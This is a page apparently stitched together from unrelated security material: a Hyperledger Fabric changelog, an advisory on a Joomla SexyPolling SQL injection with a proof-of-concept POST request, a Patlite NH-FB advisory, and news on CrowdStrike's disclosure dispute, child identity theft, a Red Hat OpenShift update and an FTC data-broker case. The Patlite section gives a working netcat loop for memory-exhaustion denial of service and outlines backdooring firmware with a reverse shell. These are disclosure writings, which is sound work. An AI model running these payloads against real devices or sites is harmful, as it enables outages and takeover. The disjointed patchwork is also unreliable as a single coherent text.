*   8d0645b Update build to use Go 1.15
*   6cb530b Change string cast of int value to rune cast
*   d539244 Directives are in comment text instead of groups
*   a1b4d2d Implement legacy name constraints verification
*   4321503 Add test to assert on name constraint behavior
*   880914c Re-encode ECDSA CRL signature during MSP setup
*   8883d71 Add test to exercise signature validation change
*   cb3c87b deps: bump github.com/pkg/errors
*   f635afd Adjust etcdraft error assertions for go 1.15
*   5f19a00 Replace test cert fixtures with generated certs
*   aa7ad4f Set SKI, support multi hosts, add Signer to CA
*   684e255 Fix typos in a "Developing Applications" doc
*   358cba7 Update AZP Service Connection Name
*   913d2ab Prepare for next release v2.2.3 (#2347)
*   eb2b1ea Add peer log message for failure to invoke chaincode (#2339)
*   0583c22 Add test newtork download instructions to create a channel tutorial
*   bebb75f v2.2.2 release commit
*   a80c772 Add release notes for v2.2.2 (#2232)
*   1de0825 Fix the issue of Nil/Zero-length-byte-array value (#2310)
*   e5ecdef Remove system channel from Test Network tutorial
*   c25eb86 \[FAB-15648\] document update: Non-TLS orderer with etcdraft usage (#1678)
*   a861c00 cherry pick test network doc chaincode deployment fix
*   10c7839 Remove unreachable and unnecessary code in gossip membership (#2295)
*   6805515 Orderer deployment tutorial update
*   fba5d90 \[doc\] fix broken link
*   48bad48 \[FAB-18170\] Endorsement policy page discusses NodeSDK
*   ee8fcfc \[FAB-18392\] Clarify scope and limitations of test network
*   90326b8 \[FAB-18252\] Documentation should reference Java chaincode support
*   813be7f Remove anchor peers from configtx.yaml tutorial (#2257)
*   11526cf Cherry pick org3 edits to release-2.2 branch (#2256)
*   5953056 Split command in "add an org to network" tutorial
*   91d9621 Add more details to logging specification examples
*   7b1dbf1 Update image filter used by integration tests
*   2a8d96c Remove Short Names and Replace With Full Path in Fabric
*   b2a5aec Check correct error
*   73b39dc \[FAB-18378\] Log warning when peer is lagging behind and cannot catch up
*   d5d9965 \[FAB-17039\] Skip retrieving pvtdata from transient store when txid is missing (#2183) (#2201)
*   3496dfc \[FAB-17954\] Document CouchDB JSON determinism (#2187)
*   26cbec6 \[FAB-18323\] CherryPick: remove ephemeral from BCCSP SW options (#1553)
*   db9a56f Fixes Hardened to Hardware
*   a381654 remove repeated the
*   bbaa5b8 update private-data sample instruction for Asset owner string
*   82b4566 Remove reference to first-network
*   0a1fc23 \[FAB-17727\] Log warning if system channel has no consortium members (#2149)
*   935a5c2 Deploy production ordering service doc
*   c928359 Add release note for RSA CA changes
*   50ca5d4 Add integration test for MSPs with RSA CA certs
*   b3646e5 Restore RSA support for x509 public key import
*   4026413 Add check for invalid key before hitting couchdb (#2133) (#2135)
*   b8a095f Add persistent volume note to peer deploy guide
*   bf2ebb6 \[FAB-18298\] Default cluster cert and key (#2119)
*   cae9a63 Update Go to 1.14.12
*   b247ed4 Revert "Allow BCCSP config to be set using env var (#1900)"
*   d1b4524 Update Jira instructions in contributing guide
*   d1730da Cherry pick \[FAB-18290\] Add channel name to pvtdata reconciler log msgs (#2091)
*   99c2d12 Deduplicate orderer server TLS root CAs
*   1e15b64 Log TLS handshake duration
*   9c5b283 FAB-18244 single node catches up with snapshot (#1964) (#2021)
*   09234c0 Remove common name from private data doc
*   5a37306 Fixed TLS certs validation for consenters (release-2.2) (#2005) \[ #1888 \]
*   6f3ad12 \[FAB-18270\] Disable debug of CouchDB response body
*   4d40d65 Peer deployment guide
*   70c41c1 Update help text in test net tutorial
*   8930c8c Fix Node OU error message
*   ab7104a Update release docs
*   4a63642 Cherry pick private data tutorial rebase
*   e36ca29 Add Troubleshooting topic to Test Network for Docker Desktop setting
*   e05c443 Allow tick interval override via orderer.yaml
*   32cb396 Fix chaincode lifecycle tutorial invoke
*   ceb23df Always Finalize the PKCS11 FindObject Operation
*   2d59f18 Corrected to capitalized function names.
*   6a370f7 Fix table width issue
*   f2e9e6e Allow BCCSP config to be set using env var (#1900)
*   6bd0699 Exercise a full end-to-end flow with PKCS11 (#1717)
*   0b3b95f removed unused variable
*   bf0b300 \[FAB-17129\] Configure peer and orderer to use PKCS#11 as BCCSP in integration test
*   8407bc8 Prepare for next release v2.2.2
*   74ac27c Add two and three digit publishing
*   344fda6 Release commit for v2.2.1
*   bebb5d8 Cherry pick secured asset transfer tutorial to 2.2
*   ba9eaff \[FAB-18041\] Add Node.js to CC as external service
*   107a867 Remove No Longer Relevant Release Note
*   99a01b2 Update release notes with FAB-18250
*   7b7ad6b Fix missing word
*   f9f3caf Add change in documentation to explain how to add collaborators in translation
*   61c05b8 \[FAB-18250\] Check Error Before Returning Session to Pool (#1937)
*   765bb73 Remove escc and vscc from list of system chaincodes
*   9906643 Update v2.2.1 release notes with latest fixes
*   c5cf627 Fix empty address in peer CLI ClientWait log
*   75046cf Remove GetSessionInfo Call
*   2e4527b Bug Fix: Saving big payloads by cache CouchDB (#1909)
*   fe684f8 Fix flakey raft/cft integration test
*   e2fa653 Add release notes for v2.2.1
*   6b1ac6f \[FAB-18237\] always update stateInfo message upon chaincode update
*   f32cb81 Bugfix in collection config history mgr (#1904)
*   3ee47a7 fix function name typo in store private data command
*   ffcbf25 Clarify tlsHandshakeTimeShift CLI help text (#1894)
*   673c364 Correct the explanation for signcerts in Membership section
*   68d13ed Update write\_first\_app.rst
*   dc8660b Regenerate peer CLI docs
*   6c9abf9 Peer CLI communicate with orderers with expired TLS certs (#1863)
*   6f76408 Bump fabric-config dep to 0.0.7
*   c5c1105 address review comments (#1890) (#1893)
*   a5a6acd pass unreconciled missing pvtdata to pvtdata store (backport to release-2.2) (#1886)
*   ee2bc1b pass unreconciled missing data info to ledger from reconciler (#1797)
*   bc00758 construct unreconciled missing pvtdata (#1699)
*   e500de9 deprioritize unreconcilable missingPvtData (#1721)
*   10cb4ea mv oldpvtdata commit to separate file
*   7eaead1 refactor pvtdatastore
*   659fe39 Adding notes for the usage of script during samples install
*   2d895c4 \[FAB-18208\] Do not sign gossip message if membership is empty
*   42da963 Convert Azure Pipeline To Stages (#1874)
*   6a02559 Fix data race in gossip/discovery test
*   7dcd9fd Minor doc fix to clear Sphinx local build error
*   09764d8 fix missing err check in the block commit path (#1543)
*   cc6dc99 minor cleanup of pvtdatastore
*   20f0697 reset leveldb batch after the commit
*   bebe131 Use directly leveldb batch (#1507)
*   99332da \[FAB-18194\] Fix service discovery for legacy installed chaincodes
*   0bd0ab2 Update RTD Placeholder
*   ef2632e \[FAB-18191\] Remove contents of leveldb dir instead of the dir itself when dropping dbs (#1828)
*   8dae484 \[FAB-18120\] Adding DevMode integration test for new lifecycle.
*   9da753a \[FAB-18169\] Add DevMode support in ChaincodeEndorsementInfoSource
*   8bbedb8 Revert "\[FAB-18183\] Bump sphinx in requirements.txt to v1.8.5"
*   bf8f6fc \[FAB-18188\] Log orderer and peer cert expiration date upon startup (#1804)
*   0e52fff \[FAB-18171\] Disregard certificate validity period in intra-orderer communication
*   445b997 \[FAB-18183\] Bump sphinx in requirements.txt to v1.8.5
*   2fc575c Cache bccsp keys generated from getECKey
*   7b8de81 Add object handle cache to PKCS#11 bccsp provider
*   bf2f3fc Make ecPoint a method on impl
*   2a22160 Make findKeyPairFromSKI a method on impl
*   86a5c64 Replace loadLib with initialize method
*   8a63732 Merge pkcs11/impl.go and pkcs11/pkcs11.go
*   f47ac7d Drain session pool before creating new sessions
*   4fd232e Add instructions for how to use @Mergifyio backport command
*   2d522b5 Update Add an Org to a Channel tutorial
*   2813aba Updates to CouchDB doc tutorial
*   4919fa7 Updated Using CouchDB to use asset transfer ledger queries smart contract
*   64c7600 Update Channel Update (Adding an Org) tutorial
*   7d6bb0f Update docs to replace fabcar references with basic asset transfer
*   1450e3c Add links for Go and Java sample applications
*   b8b7af7 Refactor tutorial to 'Writing Your First Chaincode'
*   14ad1d7 \[FAB-18109\] Update peer chaincode invoke
*   e042657 Fix code snippet display (#1759)
*   9783edb Write Your First App tutorial updates (#1757)
*   9563518 Update "Deploying a smart contract" tutorial. (#1756)
*   417bcd4 Update "Using the Fabric Test network" tutorial (#1755)
*   0b598c4 Update Write Your First Application Tutorial (#1754)
*   c4e310d Remove Use of Manifest Tool
*   5f16da8 Update RTD to Target Correct GH Release Branch
*   6491f6a Fix and improve discovery TLS authentication comments in document

This list of changes was auto generated.

CVE-2022-31121: Release v2.2.7 · hyperledger/fabric

Joomla SexyPolling version 2.1.7 suffers from a remote SQL injection vulnerability.

# Exploit Title: Joomla Plugin SexyPolling 2.1.7 - SQLi  
# Google Dork: intext:"Powered by Sexy Polling"  
# Date: 2022-02-08  
# Exploit Author: Wolfgang Hotwagner  
# Vendor Homepage: https://2glux.com/projects/sexypolling  
# Software Link: https://2glux.com/downloads/files/free/sexypolling_pack_2.1.7_2glux.com.zip  
# Version: all versions below version 2.1.8  
# Tested on: Debian Bullseye

SexyPolling SQL Injection

====================

| Identifier: | AIT-SA-20220208-01|  
| Target: | Sexy Polling ( Joomla Extension) |  
| Vendor: | 2glux |  
| Version: | all versions below version 2.1.8 |  
| CVE: | Not yet |  
| Accessibility: | Remote |  
| Severity: | Critical |  
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |

Summary

========

[Sexy Polling is a Joomla Extension for votes.](https://2glux.com/projects/sexypolling). In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST-parameters to poll.php.

Vulnerability Description

====================

In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and sanitized. An attacker can use these parameters to send payloads for sql injections.

In lines 74 and 75 in the *site/vote.php* code, the parameters are assigned without being checked:

```  
$min_date_sent = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : '';  
$max_date_sent = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : '';  
```

These are later used unfiltered by the WHERE clause:

```  
$query_toal = "SELECT  
COUNT(sv.`id_answer`) total_count,  
MAX(sv.`date`) max_date,  
MIN(sv.`date`) min_date  
FROM  
`#__sexy_votes` sv  
JOIN  
`#__sexy_answers` sa ON sa.id_poll = '$polling_id'  
AND  
sa.published = '1'  
WHERE  
sv.`id_answer` = sa.id";

//if dates are sent, add them to query  
if ($min_date_sended != '' && $max_date_sended != '')  
$query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' ";  
```

Proof Of Concept

==============

To check a system for vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe.

HTTP-Request:  
```  
POST /components/com_sexypolling/vote.php HTTP/1.1

Host: joomla-server.local  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
HTTP_X_REAL_IP: 1.1.1.1  
Content-Length: 193  
Origin: joomla-server.local  
Connection: close  
Referer: joomla-server.local/index.php/component/search/  
Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6

polling_id=1&answer_id[]=3&dateformat=digits&min_date=2021-12-07'&max_date=2021-12-14&country_name=-&country_code=-&city_name=-&region_name=-&voting_period=24&ae9a061e2170d406fb817b9ec0c42918=1  
```

The HTTP-Resoonse contains a mysql error:

```  
HTTP/1.1 500 Internal Server Error  
Date: Wed, 15 Dec 2021 10:27:40 GMT  
Server: Apache/2.4.41 (Ubuntu)  
Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-cache  
Pragma: no-cache  
Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/  
Content-Length: 4768  
Connection: close  
Content-Type: application/json

<!DOCTYPE html>  
<html lang="en-gb" dir="ltr">  
<head>  
<meta charset="utf-8" />  
<title>Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '00:00:00' AND sv.`date` <= '2021-12-14 23:59:59'' at line 12</title>  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" />  
```

Vulnerable Versions  
================  
All versions below version 2.1.8

Tested Versions  
=============  
Sexy Polling ( Joomla Extension) 2.1.7

Impact  
======  
An unauthenticated attacker could inject and execute SQL commands on the database.

Mitigation  
=========  
Sexy Polling 2.1.8 fixed that issue

Vendor Contact Timeline  
====================  
| 2021-12-14 | Unable to find a contact of the vendor |  
| 2021-12-15 | Contacting Joomla Security Strike Team |  
| 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the problem. |  
| 2022-01-01 | Sexy Polling releases 2.1.8 |  
| 2022-04-08 | Public Disclosure |

*We would like to note that the communication about this issue was weak. The contact-form of the maintainer of sexy_polling was broken and there was no other contact published. The Joomla Security Strike Team let us know that they will investigate, but they did not send any updates about the progress.*

Advisory URL  
===========  
[https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling)

Joomla SexyPolling 2.1.7 SQL Injection

Patlite NH-FB v1.46 and below was discovered to contain insufficient firmware validation during the upgrade firmware file upload process. This vulnerability allows authenticated attackers to create and upload their own custom-built firmware and inject malicious code.

**Patlite NH-FB series vulnerability.****Product Description:  
**

The NH-FB series devices from Patlite are network monitoring and real-time notifications of predesignated events and device failures via visual signals and email alerts.

**Affected Products:  
**

All Patlite NH-FB series (NHL-xFB1 / NHP-xFB2 / NHL-xFB2 ) devices from version 1.46 and under.  

**Vulnerability Summary:**

*   Vulnerability 1 \[CVE-2022-35911\] - Unauthenticated Remote Denial of Service.  
    The binary file control (/etc/lighttpd/api/control) allocates a buffer for each read operation that occurs for a request, could allow an unauthenticated, remote attacker to cause a denial of service (memory consumption) by removing expected GET parameter. The vulnerability is due to an insufficient logic condition and does not check if any GET parameters are present during the API the call. An attacker could exploit this vulnerability by sending a high rate of TCP packets to the specific API endpoint control on a targeted device.  
    
*   Vulnerability 2 - Insufficient firmware validation  
    Patlite NH-FB series (NHL-xFB1 / NHP-xFB2 / NHL-xFB2 ) is affected by an insufficient firmware validation during the upgrade firmware file upload process. An authenticated, remote attacker can build his own custom firmware and inject malicious code inside. A successful exploit could allow the attacker to have a full control of the device This issue affects all Patlite NH-FB series (NHL-xFB1 / NHP-xFB2 / NHL-xFB2 ) version 1.46 and under.
    

**Reproduction Steps:**

1.  Unauthenticated Remote Denial of Service.  
    A simple request to the endpoint /api/control/AAAAAAAAAAAAAAAAAA will confuse the program which is theoretically expecting to receive a GET parameter alert (/api/control?alert=1) but as this is not expected for by the program it will cause a denial of service and display the contents of the binary file control after some times keeping loading.  
    

Payload

for i in {0..1000}; do echo "\[$i\]: "; echo -ne "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1\\r\\nHost: 172.31.42.235\\r\\n\\r\\n" | nc 172.31.42.235 80; done \> /dev/null 2>&1

This loop will consume all the memory of the device and make it temporarily unusable.

Video PoC Patlite memory consumption (dos) - CVE-2022-35911 

2\. Insufficient firmware validation  
This vulnerability gives us the possibility to craft our own custom firmware as there is no firmware validation during the upgrade device process. In the following proof of concept we are going to add a reverse shell payload in the /pns-b/install-web script file that will be triggered when the malicious firmware will be uploaded in the target machine.

Step 1 - Download the Patlite firmware from the offcial website and extract the content.

Step 2 - Let's modify the content of the script /pns-b/install-web to add our reverse shell payload.  

Step 3 - Repack the firmware  

Step 4 - Upload the backdoored firmware in the device, create a listener and wait for the Patlite device to connect to us.  

As you can see, the reverse shell was perfectly executed during the update process. We have now full control on the device with root privilege.

Video PoC Patlite ver1.43 - Insufficient firmware validation 

**Recommendation Fixes / Remediation:**

Vulnerability 1: Just before the function getShareMemoryAddr is called a condition must check if the current request really contains 2 GET parameters.  
  
More info: https://cwe.mitre.org/data/definitions/703.html

Vulnerability 2: To accept an update, the Patlite device needs to verify the respective code signature of all software components included in the firmware update. This integrity protection ensures that no unauthorized entity can modify the firmware image.  
More info: https://cwe.mitre.org/data/definitions/347.html

**Vulnerable Devices Found:**

As of 25Jul2022, there were 5 Patlite NH-FB series devices exposed to the internet and were affected by the vulnerabilities discovered.

**Reference:**

https://www.patlite.co.jp/product/detail0000021462.html  
https://www.patlite.com/network-products/lineup/nh-fb.html

**Security researchers:**

*   Thomas Knudsen
*   Samy Younsi

CVE-2022-38625: Patlite-NH-FB.md

The vulnerability might not be noteworthy, but the reporting process may be A security firm has criticized CrowdStrike for operating a “ridiculous” bug bounty disclosure program following a sensor fla

The vulnerability might not be noteworthy, but the reporting process may be

A security firm has criticized CrowdStrike for operating a “ridiculous” bug bounty disclosure program following a sensor flaw report.

In April, Pascal Zenker, a partner of Swiss security analyst service Modzero AG, discovered a vulnerability in CrowdStrike Falcon Sensor, agent software used to transmit data to the Falcon endpoint security platform.

The vulnerability, tracked as CVE-2022-2841, allowed attackers to exploit and bypass the one-time generated token check used to uninstall the sensors on Windows devices, thereby cutting security event data streams and potentially leaving the machine vulnerable to further compromise by malware.

The team created an automated proof-of-concept (PoC) tool to corrupt the sensor and ignore the token check in Falcon versions 6.31.14505.0 and 6.42.15610.

However, the attacker already needed administrator privileges to achieve this security bypass, relegating the potentially high-risk vulnerability to a low-severity issue.

Modzero says the bug wasn’t “worth a tweet” as the “overall risk of the vulnerability is very limited,” however, the alleged response of CrowdStrike was worth commenting on.

“We’d like to shed some light on a ridiculous vulnerability disclosure process with CrowdStrike,” the company tweeted.

**Third-party program**

According to a security advisory published Monday (August 22), Modzero expected a clean-cut vulnerability disclosure process from the Nasdaq-listed IT firm. However, Modzero says the “communication and disclosure with CrowdStrike was tedious and turned unprofessional in the end”.

CrowdStrike runs a bug bounty program through HackerOne. The bone of contention appeared that CrowdStrike wanted Modzero to submit the vulnerability through the program. Still, the company did not want to agree to the program’s terms, which were said to include signing a mutual non-disclosure agreement.

Modzero said it requested a direct security contact outside of HackerOne, and after months of emails, the company submitted a draft security advisory in late June, together with a PoC.

Read more of the latest bug bounty news

CrowdStrike said bug replication had not been possible on more recent software versions. Modzero requested a trial version of the latest software, which was allegedly denied.

“As the issue was not considered valid, we informed CrowdStrike that we would release the advisory to the public,” Modzero commented.

“In response, CrowdStrike tried again to set up a bug bounty disclosure meeting between ‘Modzero’s sr Leadership and CrowdStrike CISO \[...\] to discuss \[the\] next steps related to the bug bounty disclosure’ in contrast to our previously stated disclosure rules.”

Modzero said it then acquired a recent version of the software and verified the vulnerability still existed. However, the exploit code had been flagged as malicious – an alleged change that was easily remedied by tweaking the exploit code.

**Advisory published**

Modzero has since published the security advisory, criticizing the cybersecurity firm for being inflexible outside its “NDA-ridden bug bounty program”.

“\[We concluded\] that CrowdStrike tried to ‘fix’ the issue while being told the issue didn’t exist. Which is pretty disrespectful to us,” Modzero commented.

When approached for comment, CrowdStrike directed us to a statement posted on Reddit on Monday (August 22) that links back to Modzero’s advisory.

The cybersecurity firm says that the main problem is a fail-open condition in the Microsoft Installer (MSI) harness, and the issue has been reported to the relevant parties.

According to the company, controlling it would require moving away from the MSI framework. The vulnerability could only be exploited with specialized software, local admin access, privilege elevation, and an endpoint reboot.

CrowdStrike informed customers in July.

“Detection logic was also added to the sensor to try to detect this technique and similar ones,” CrowdStrike added. “We thank Modzero for their hard work and disclosure of this incident.”

_The Daily Swig_ has reached out to Modzero with additional queries and we will update when we hear back.

**RECOMMENDED** Secure Open Source Rewards program launched to help protect critical upstream software

Security researchers blast ‘ridiculous’ CrowdStrike bug disclosure practices

The personal information of children is leaked by trusted institutions which can lead to identity fraud and identity theft

Sorry for the headline, but we have to get creative to get anyone to read an article on a Friday like this one, even if it is an important story.

As we enter the holidays and parents begin to rest after another hectic year of shopping for their kids, Malwarebytes Labs wants to draw some attention to a part of most children’s lives that deeply affects their online security: The education system.

Although children in the US can’t take out loans or get credit cards on their own, they can end up as victims of identity theft, which can end up being a lifelong burden in the form of bad credit ratings and even criminal records.

An old study by Experian estimated that 25 percent of children will be victims of identity fraud or theft by the time they are 18 years old. In the current system it’s even possible that a newborn gets assigned a Social Security Number (SSN) which has already been used by a criminal.

The Social Security Administration (SSA) has already assigned more than half of all available SSNs and because there is no check before the number gets issued, a baby could end up getting one with a bad history.

But usually, it happens later on. According to Javelin’s 2022 Child Identity Fraud Study, approximately 1.7 million US children had their personal information exposed and potentially compromised due to data breaches in 2021.

Many of the leaked information about children comes, unsurprisingly, from the educational institutions that they visit.

Breaches in education don’t follow a pattern or affect only children. They range from leaky school apps to ransomware and from childcare to the teacher’s retirement system.

Even though the Taxpayer First Act of 2019 mandates that the IRS notify taxpayers, including parents and guardians, when there is suspected identity theft, it has been criticized for not complying with this obligation.

So, parents and guardians need to be vigilant themselves.

**How to keep an eye on your children’s identities**

There are a few things you can do.

*   Contact the three major credit bureaus (Equifax, Experian, and TransUnion) to check if your child has a credit report. Generally, children under 18 should not have a credit report. If a report exists, it may indicate identity theft. If a credit report is found, inform the credit bureau it may be fraudulent. You may need to provide documents to credit bureaus to verify your child’s identity and your own.
*   If your child is under 16, you can request a free credit freeze to prevent new accounts from being opened in their name. This freeze remains in place until you request it to be removed. The process for getting a freeze for a minor is different than getting one for an adult. The credit bureaus give specific instructions at these three sites: Experian, Equifax, and TransUnion.
*   Limit who you share your child’s Social Security number with and only provide it when absolutely necessary. Don’t be afraid to ask why the information is needed and how it will be protected.
*   If you suspect your child’s identity has been stolen, report it to the Federal Trade Commission (FTC) at IdentityTheft.gov. Also, contact your local law enforcement to get a police report and notify the fraud departments of companies where fraudulent accounts were opened in your child’s name.

If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identity**

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Our Santa wishlist: Stronger identity security for kids 

Red Hat Security Advisory 2023-1154-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.10.54.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.10.54 security update  
Advisory ID:       RHSA-2023:1154-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1154  
Issue date:        2023-03-16  
CVE Names:         CVE-2021-4238 CVE-2022-41717   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.10.54 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.10.54. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHBA-2023:1153

Security Fix(es):

* goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as  
random as they should be (CVE-2021-4238)

* golang: net/http: An attacker can cause excessive memory growth in a Go  
server accepting HTTP/2 requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For OpenShift Container Platform 4.10, see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

      The sha values for the release are

      (For x86_64 architecture)  
The image digest is  
sha256:b13ee67469f7f85a1b1daf57424f3c7c02c3a188cb640dc6284742091a7e6d50

      (For s390x architecture)  
The image digest is  
sha256:4c776be05c475ee885829444509258b486d79d8128e12d6d2263ab7cdef83ce8

      (For ppc64le architecture)  
The image digest is  
sha256:2d4e0af6ca2afc8c10d210aa520aba602618f3fad4cb42636bddb57b1f0ce425

      (For aarch64 architecture)  
The image digest is  
sha256:7cadaaf6e0f71645864963e6c47c75852ce68aff80c963dfba2ddf51c0b836c4

All OpenShift Container Platform 4.10 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2156729 - CVE-2021-4238 goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be  
2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-3997 - [4.10] provisioning interface on master node not getting ipv4 dhcp ip address from bootstrap dhcp server on OCP IPI BareMetal install  
OCPBUGS-4341 - oc get dc fails when AllRequestBodies audit-profile is set in apiserver  
OCPBUGS-5977 - Implement LIST call chunking in openshift-sdn  
OCPBUGS-7657 - Editing Pipeline in the ocp console to get information error  
OCPBUGS-7741 - [release-4.11] fail early on missing node status envs  
OCPBUGS-7795 - thanos-ruler-user-workload-1 pod is getting repeatedly re-created after upgrade do 4.10.41  
OCPBUGS-7815 - [release-4.10] [AWS EFS] NFS mount disconnects and becomes unavailable.  
OCPBUGS-7827 - set default timeouts in etcdcli  
OCPBUGS-7831 - PTP BC: Unexpected openshift_ptp_clock_state metric added in FREERUN state after bringing down and up a ptp slave interface  
OCPBUGS-7997 - PTP 4.12 Regression - CLOCK REALTIME status is locked when physical interface is down  
OCPBUGS-8020 - Azure Disk volume is taking time to attach/detach

6. References:

https://access.redhat.com/security/cve/CVE-2021-4238  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBLe5tzjgjWX9erEAQhA4g//TGys159MdqutZY0CjUWfpF3H7rc1yLML  
skq9MCCDPxTRSiEelRPESiZJMS0q6kTVa9imRyh801eIVeh+pDSjdtEIpt4fgDA9  
C/Bz5cXuhOcM8O64KdhDGCxz6a+eTfiKhb4QfmsdsQNp+kgGRt2L5ZDtuxru3I09  
Jk3qFWCTnFPg6oyyNjvEeFo7AsOS2+pCmTg9t5RlDux0LOZOaZMprZK1YnnnjbWq  
/wp8aV/OHyLa2C9Y3hxc0nIWxuIpluZbNADeAj4RFGh9sXzPp132ZVcCVNB2dxNv  
zOD2pk7cIR0dpKQXd/hAgq01r4EPGBb8GbOD7ot3EUsyOtUPxVUoJCM3sfd0utR8  
xbPvoApPOnKgyIHmGPNQRTiPgPGHBLpn2u4h14veKKu0IaP+IbZkUZgx8k8Y+/Kw  
RiSaWpUSR/Lmx78IGsgGwVB2GPhETbM5Iy6dCI2o3IhcsEWHYcZM9Wxz/sXrvf3H  
kf+DySNGqLnU60Bp3hJOJ5xov2caIRgr2VaHkUzXNVLIHh/2l6HOWNg3fVtAgg3a  
97eUdGQs+fdy6o+b9acg0hc+7g69PujvKCat1uuarBFYw4A+I+aoqDMwnwmodBmG  
Cpe2b2rtPuY4JgLa9C8GUwTTlLAKtkUxcK8wxYnSPkNHuoS5eKy+1L2SI59j3wVV  
kxrlc7O6pCg=  
=olEr  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1154-01

The FTC is targeting data brokers that monitored people’s movements during protests and around US military installations. But signs suggest the Trump administration will be far more lenient.

The United States Federal Trade Commission is taking action against two American data brokers accused of unlawfully trafficking in people’s sensitive location data. The data was used, the agency says, to track Americans in and around churches, military bases, and doctors’ offices, among other protected sites. It was sold not only for advertising purposes but also for political campaigns and government uses, including immigration enforcement.

Mobilewalla, a Georgia-based data broker that’s said to have digitally tracked the residents of domestic abuse shelters, is accused by the agency of purposefully tracking protesters in the wake of George Floyd’s murder in 2020. In a court filing, the FTC says Mobilewalla attempted to unmask the protesters’ racial identities by tracking their mobile devices to, for example, Hindu temples and Black churches.

The FTC also accused Gravy Analytics and its subsidiary Venntel of harvesting and exploiting consumers’ location data without consent, alleging that the company used that data to unfairly infer health decisions and religious beliefs.

According to the FTC, Gravy Analytics collected over 17 billion location signals from approximately a billion mobile devices daily. It has reportedly sold access to that data to federal law enforcement agencies such as the Department of Homeland Security, the Drug Enforcement Agency, and the Federal Bureau of Investigation.

Gravy Analytics could not be immediately reached for comment.

A spokesperson for Mobilewalla says the company's privacy policies are constantly evolving, adding: “While we disagree with many of the FTC’s allegations and implications that Mobilewalla tracks and targets individuals based on sensitive categories, we are satisfied that the resolution will allow us to continue providing valuable insights to businesses in a manner that respects and protects consumer privacy.”

“This data can be used to identify and target consumers based on their religion,” the FTC says. The location data collected by the two companies makes it possible, the agency says, to “identify where individual consumers lived, worked, and worshipped, thus suggesting the mobile device user’s religion and routine and identifying the user’s friends and families.”

